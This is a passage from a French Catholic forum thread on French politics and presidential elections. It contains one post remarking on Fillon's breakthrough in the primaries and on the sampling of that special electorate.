Et même pour les primaires , la percée de Fillon a été notée. Ce qui a rendu le résultat un peu loin , c'est l'échantillonnage d'un electorat spécial.  Pour les présidentielles c'est différent.
Revenir en haut Aller en bas
Contenu sponsorisé





Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 Empty

Revenir en haut Aller en bas
 
Politique française et élections présidentielles
Revenir en haut 
Page 14 sur 20Aller à la page : Précédent  1 ... 8 ... 13, 14, 15 ... 20  Suivant
 Sujets similaires
-
» Politique française et élections présidentielles
» Politique française et élections présidentielles
» Politique française et élections présidentielles
» Mon programme pour les présidentielles
» Election présidentielle 2012

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE :: Philosophie réaliste, Discussions diverses-
Sauter vers: